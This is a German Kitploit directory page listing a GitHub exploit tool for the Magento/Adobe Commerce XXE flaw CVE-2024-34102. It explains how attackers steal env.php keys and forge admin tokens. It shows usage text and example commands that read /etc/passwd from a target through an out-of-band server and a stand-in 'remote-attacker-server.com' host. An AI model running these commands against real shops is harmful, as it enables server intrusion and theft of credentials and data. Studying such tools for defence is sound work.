Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento — CosmicSting: kritische, nicht authentifizierte XXE-Sicherheitslücke in Adobe Commerce und Magento (CVE-2024-34102) | Kitploit
Tools/GitHubGitHub/jakabakos/cve-2024-34102-cosmicsting-xxe-in-adobe-commerce-and-magento
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffungPenetrationstests
GitHubjakabakos/cve-2024-34102-cosmicsting-xxe-in-adobe-commerce-and-magento

CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CosmicSting: kritische, nicht authentifizierte XXE-Sicherheitslücke in Adobe Commerce und Magento (CVE-2024-34102)

Repository anzeigen
91vor 2 JahrenNoch nicht geprüft

CosmicSting: Kritische, nicht authentifizierte XXE-Sicherheitslücke in Adobe Commerce und Magento (CVE-2024-34102)

CVE-2024-34102 ist eine schwerwiegende Sicherheitslücke, die aus unsachgemäßer Handhabung von verschachtelter Deserialisierung in Adobe Commerce und Magento resultiert. Diese Schwachstelle ermöglicht es Angreifern, XML External Entities (XXE) während des Deserialisierungsprozesses auszunutzen, was potenziell zu einer Remotecodeausführung führen kann. Kurz gesagt, können Angreifer schädliche JSON-Nutzdaten erstellen, die bei der Deserialisierung durch die Anwendung Objekte mit unbeabsichtigten Eigenschaften oder Verhaltensweisen instanziieren. Dies könnte zu verschiedenen Sicherheitsrisiken führen.

Die Ausnutzung dieser Schwachstelle erlaubt es Angreifern, unbefugten Administratorzugriff auf die REST-API, GraphQL-API oder SOAP-API zu erlangen, was möglicherweise zu Datendiebstahl, Dienstunterbrechung und vollständiger Kompromittierung betroffener Systeme führt. Diese Schwachstelle stellt ein erhebliches Risiko dar, da sie sensible Dateien wie app/etc/env.php exfiltrieren kann, die kryptografische Schlüssel zur Authentifizierung enthalten. Angreifer können dies ausnutzen, um Administrator-Token zu fälschen und Magento-APIs als privilegierte Benutzer zu manipulieren.

Darüber hinaus kann CVE-2024-34102 mit anderen Schwachstellen wie dem PHP-Filterketten-Exploit (CVE-2024-2961) kombiniert werden, was zu einer Remotecodeausführung (RCE) führt. Die weitreichenderen Auswirkungen von XML-External-Entity (XXE)-Sicherheitslücken ermöglichen es Angreifern, Daten aus externen Quellen abzurufen und zu manipulieren, was die potenziellen Auswirkungen auf kompromittierte Systeme verstärkt.

Verwendung

root@kitploit:~
usage: exploit.py [-h] --target TARGET --read-file READ_FILE [--oob-server OOB_SERVER] [--host-server HOST_SERVER]

Exploit script for XXE vulnerability

options:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        Target URL (http(s)://ip[:port])
  --read-file READ_FILE, -r READ_FILE
                        File to read from the remote host
  --oob-server OOB_SERVER, -ob OOB_SERVER
                        OOB server URL (http(s)://ip[:port])
  --host-server HOST_SERVER, -hs HOST_SERVER
                        Host server URL (http(s)://ip[:port])

Beispiele

root@kitploit:~
# Run with local attacker server and local OOB server
python3 exploit.py -t https://magento.test -r "/etc/passwd"

# Run with remote attacker server and remote OOB server
python3 exploit.py -t https://magento.test --oob-server http://xxx.oasitfy.com --host-server https://remote-attacker-server.com -r "/etc/passwd"

# Detection
python3 detect.py -t https://magento.test

Haftungsausschluss

Dieses Exploit-Skript wurde ausschließlich zu Forschungszwecken und zur Entwicklung effektiver Abwehrtechniken erstellt. Es ist nicht für böswillige oder unbefugte Aktivitäten bestimmt. Der Autor und der Eigentümer des Skripts lehnen jegliche Verantwortung oder Haftung für Missbrauch oder Schäden ab, die durch diese Software verursacht werden. Benutzer werden dringend gebeten, diese Software verantwortungsvoll und nur in Übereinstimmung mit den geltenden Gesetzen und Vorschriften zu verwenden. Verwenden Sie es verantwortungsvoll.

Tool herunterladen